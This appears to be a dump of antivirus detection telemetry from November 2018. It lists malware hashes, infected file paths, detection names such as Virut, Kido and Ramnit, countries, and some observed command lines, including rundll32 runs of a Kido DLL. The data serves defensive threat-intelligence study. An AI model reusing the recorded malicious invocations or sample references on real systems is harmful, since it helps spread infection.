  Row(detection=Row(filename='8e4cc0cfe015c7821462dc1dfe6c50485ea2c56b7e87f32b9d55f595665d0b56', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-15.available\\Avira\\8E4CC0CFE015C7821462DC1DFE6C50485EA2C56B7E87F32B9D55F595665D0B56', filesize=192000, name='TR/Crypt.XPACK.Gen.#M300.#R5139'), hash='8e4cc0cfe015c7821462dc1dfe6c50485ea2c56b7e87f32b9d55f595665d0b56', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:37:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='snailmail.exe', filepath='G:\\ألعاب\\Removable Disk\\Removable Disk\\t\\SnailMail.exe', filesize=3072000, name='W32/Virut.Gen.#M1.#R1'), hash='8e8e9ad3cdd5bc9aa6ff06062ff8e884d6a03f31c08e84df1743eb9415135347', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T11:55:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='snailmail.exe', filepath='G:\\ألعاب\\Removable Disk\\Removable Disk\\t\\SnailMail.exe', filesize=3072000, name='W32/Virut.Gen.#M1.#R1'), hash='8e8e9ad3cdd5bc9aa6ff06062ff8e884d6a03f31c08e84df1743eb9415135347', metadata=Row(cmdline='\\\\\\/flags:0x0', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\LogonUI.exe', parentsize=10752, timestamp='2018-11-01T19:14:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='snailmail.exe', filepath='G:\\ألعاب\\Removable Disk\\Removable Disk\\t\\SnailMail.exe', filesize=3072000, name='W32/Virut.Gen.#M1.#R1'), hash='8e8e9ad3cdd5bc9aa6ff06062ff8e884d6a03f31c08e84df1743eb9415135347', metadata=Row(cmdline='\\\\\\/flags:0x0', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\LogonUI.exe', parentsize=10752, timestamp='2018-11-01T01:27:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='snailmail.exe', filepath='G:\\ألعاب\\Removable Disk\\Removable Disk\\t\\SnailMail.exe', filesize=3072000, name='W32/Virut.Gen.#M1.#R1'), hash='8e8e9ad3cdd5bc9aa6ff06062ff8e884d6a03f31c08e84df1743eb9415135347', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T20:28:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='snailmail.exe', filepath='G:\\ألعاب\\Removable Disk\\Removable Disk\\t\\SnailMail.exe', filesize=3072000, name='W32/Virut.Gen.#M1.#R1'), hash='8e8e9ad3cdd5bc9aa6ff06062ff8e884d6a03f31c08e84df1743eb9415135347', metadata=Row(cmdline='\\\\\\/flags:0x0', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\LogonUI.exe', parentsize=10752, timestamp='2018-11-01T13:47:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='admparse.dll', filepath='E:\\soft\\Essentials\\Internet Explorer 7 Final For Windows XP SP2 No WGA Check\\ADMPARSE.DLL', filesize=300000, name='W32/Ramnit.C.#M0.#R0'), hash='8ee5771d43b95c9c4f13e34591288c1c0276c3fa230f0ca8dfe4052e21adf583', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='3', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T03:15:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='заявка_университет_итмо_сноуборд_2.exe', filepath='E:\\УФКиС\\Заявки на соревнования\\Заявка_Университет_ИТМО_сноуборд_2.exe', filesize=1728000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='8ef95d133c9a034779aba772a4f9c23fb63962a2c2dbb82063dda2d7a21d4ed5', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T11:30:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-144139-10664d79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_00648505\\AVSCAN-20181101-143952-099126A6\\AVSCAN-20181101-144139-10664D79', filesize=1728000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='8ef95d133c9a034779aba772a4f9c23fb63962a2c2dbb82063dda2d7a21d4ed5', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:35:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8f460caf3e9fda628a0d42563b5f353d35e8369e360f7c906d8e425a7e3218db', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_11.10.2018-40.available\\Avira\\8F460CAF3E9FDA628A0D42563B5F353D35E8369E360F7C906D8E425A7E3218DB', filesize=2240000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='8f460caf3e9fda628a0d42563b5f353d35e8369e360f7c906d8e425a7e3218db', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T10:56:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aamlauncher.exe', filepath='C:\\Program Files (x86)\\Common Files\\Adobe\\OOBE\\PDApp\\UWA\\AAMLauncher.exe', filesize=524000, name='W32/Sality.AT.#M1.#R1'), hash='8f626bad937d36004040208af471b0e635dcfc231f9b14b2b2e0ee93b029f218', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T01:59:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='baqqnarf.exe', filepath='I:\\RECYCLER_DETEC\\S-6-6-57-2067840111-7214750817-811023153-6264\\baQQNArf.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='8f7b35340ba77e8a9d965e7cb804bd1cb4fbe8a92438390b55693dd58d8c9691', metadata=Row(cmdline='\\\\\\"I:\\\\\\\\\\\\\\" ', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T08:16:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='8fee82c5d504d02a5fd0f0a22b3aedcaba38e165dece61c3a55f5485cad201aa', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='plbjwhbmll.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\8edfd82a46a249989c53e48f509f75f7\\PLBJWHBMLL.exe', filesize=832000, name='ADWARE/Wizrem.Gen7.#M300.#R603867'), hash='9005377ec64a1412b2cea9e204dc3d39b76cf0d4f008f4c59c9b02a5fca40e3f', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:36:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-191209-38ed2091', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-191209-38ED2091', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:12:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ultimatedefrag.exe', filepath='K:\\HBCD\\Programs\\ULTIMATEDEFRAG.EXE', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:01:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-195022-c059c638', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-194803-A89BA1A8\\AVSCAN-20181101-195022-C059C638', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:50:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jetupdate.exe', filepath='C:\\Program Files\\JetAudio\\jetUpdate.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='90864d19d2b2cf26f03973e34c494eafe5889ec522117388f064ec8614bf3c3f', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T17:19:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pes2017.exe', filepath='I:\\P.2017\\PES2017.exe', filesize=110208000, name='W32/Virut.Gen.#M1.#R1'), hash='90c130054f3ad606b3be739b355f65f8485124f79f8f36c8e6b727c62ac7a5d3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T21:44:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='90c5f259076e65dbf393768136994f850806d08b149624dfc931e5c31416837c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-5.available\\Avira\\90C5F259076E65DBF393768136994F850806D08B149624DFC931E5C31416837C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='90c5f259076e65dbf393768136994f850806d08b149624dfc931e5c31416837c', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:30:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aujizqyk.dll', filepath='C:\\WINDOWS\\system32\\aujizqyk.dll', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:32:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xscsh.dll', filepath='C:\\WINDOWS\\system32\\xscsh.dll', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:57:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xifuzjcn.dll', filepath='C:\\WINDOWS\\system32\\xifuzjcn.dll', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:11:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tzpefjw.vgv', filepath='C:\\Windows\\System32\\tzpefjw.vgv', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline='tzpefjw.vgv,bauefjc', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T16:59:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tzpefjw.vgv', filepath='C:\\Windows\\System32\\tzpefjw.vgv', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline='tzpefjw.vgv,tjuqn', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T16:59:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tzpefjw.vgv', filepath='C:\\Windows\\System32\\tzpefjw.vgv', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline='tzpefjw.vgv,befiwa', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T16:59:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tzpefjw.vgv', filepath='C:\\Windows\\System32\\tzpefjw.vgv', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline='tzpefjw.vgv,fpwxeprz', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T16:59:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tzpefjw.vgv', filepath='C:\\Windows\\System32\\tzpefjw.vgv', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline='tzpefjw.vgv,slvfhcm', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T16:59:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-090958-6a621d3d', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-090941-66ACD280\\AVSCAN-20181101-090958-6A621D3D', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:09:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-073347-b9d93d02', filepath='C:\\Documents and Settings\\X\\Datos de programa\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-073316-73881F52\\AVSCAN-20181101-073347-B9D93D02', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:33:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vziubo[1].jpg', filepath='C:\\Documents and Settings\\X\\Configuración local\\Archivos temporales de Internet\\Content.IE5\\7K1LRDD5\\vziubo[1].jpg', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:32:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='zbuoc.dll', filepath='C:\\WINDOWS\\system32\\zbuoc.dll', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='BA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:06:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='euejh.dll', filepath='C:\\WINDOWS\\system32\\euejh.dll', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:56:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xuaedlbt[1].jpg', filepath='C:\\Documents and Settings\\X\\Configuración local\\Archivos temporales de Internet\\Content.IE5\\MZWLCVY3\\xuaedlbt[1].jpg', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:56:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-074705-9dcf998a', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-074618-93F68117\\AVSCAN-20181101-074705-9DCF998A', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='BA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:46:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151200-3fcd706f', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-151143-A14FC51B\\AVSCAN-20181101-151200-3FCD706F', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:11:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111232-70e93cc3', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-111202-1353B3F0\\AVSCAN-20181101-111232-70E93CC3', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:12:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tzpefjw.vgv', filepath='C:\\Windows\\System32\\tzpefjw.vgv', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline='tzpefjw.vgv,qxvfw', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T21:59:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tzpefjw.vgv', filepath='C:\\Windows\\System32\\tzpefjw.vgv', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline='tzpefjw.vgv,ehfgzmy', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T14:59:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tzpefjw.vgv', filepath='C:\\Windows\\System32\\tzpefjw.vgv', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline='tzpefjw.vgv,verrf', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T14:59:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tzpefjw.vgv', filepath='C:\\Windows\\System32\\tzpefjw.vgv', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline='tzpefjw.vgv,verrf', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T14:59:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-081022-709ee1f0', filepath='C:\\Documents and Settings\\X\\Datos de programa\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-081003-5B266F58\\AVSCAN-20181101-081022-709EE1F0', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:10:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-081033-612c63d8', filepath='C:\\Documents and Settings\\X\\Datos de programa\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-081003-5B266F58\\AVSCAN-20181101-081033-612C63D8', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:10:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jtnzdg.dll', filepath='C:\\WINDOWS\\system32\\jtnzdg.dll', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:21:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-073356-e5557870', filepath='C:\\Documents and Settings\\X\\Datos de programa\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-073316-73881F52\\AVSCAN-20181101-073356-E5557870', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:33:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='culqyw.dll', filepath='C:\\WINDOWS\\system32\\culqyw.dll', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:13:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-163651-a98daf5e', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-163613-A17CA89E\\AVSCAN-20181101-163651-A98DAF5E', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:40:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='开始游戏.exe', filepath='D:\\downloads\\SPR\\SBPR v1.11.7z\\SBPR v1.11.7z\\开始游戏.exe', filesize=2944000, name='HEUR/AGEN.1009421.#M1.#R1'), hash='9107e1f142e31753482b286c260b0de595da2c084aefa3b4732f35a68360f58d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T10:56:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-214143-b9e89ecd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3eb0228e\\AVSCAN-20181101-214107-B43275A0\\AVSCAN-20181101-214143-B9E89ECD', filesize=2944000, name='TR/StartPage.znvqb.#M1.#R1'), hash='9107e1f142e31753482b286c260b0de595da2c084aefa3b4732f35a68360f58d', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:41:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-143314-7c18030d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4d02a582\\AVSCAN-20181101-143250-786AD0A8\\AVSCAN-20181101-143314-7C18030D', filesize=2288000, name='PUA/InstallCore.#M1.#R1'), hash='916a157ec6c89876731b18b26138e9b8229a9a97811a8d572c5b4805aaee88c6', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:33:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clickjogos - ultimate spider-man - teia de ferro.exe', filepath='C:\\Users\\X\\Downloads\\ClickJogos - Ultimate Spider-Man - Teia de Ferro.exe', filesize=2288000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='916a157ec6c89876731b18b26138e9b8229a9a97811a8d572c5b4805aaee88c6', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T16:32:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='play.exe', filepath='h:\\العاب\\اكلة السكر جديد\\Play.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='91ad63cb2ada2cc75fc4749dc4d2c61d2931b1c3d9187824af7650faa8d697f3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:03:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sg[1].exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\1JX3HJWG\\sg[1].exe', filesize=4296000, name='PUA/Vbates.Gen.#M300.#R6704'), hash='92016ab03403b51745ee82018a3ceac38ce8d6f4ead9d6143eeb289088eee936', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:36:35Z'), dt=datetime.date(2018, 11, 1)),
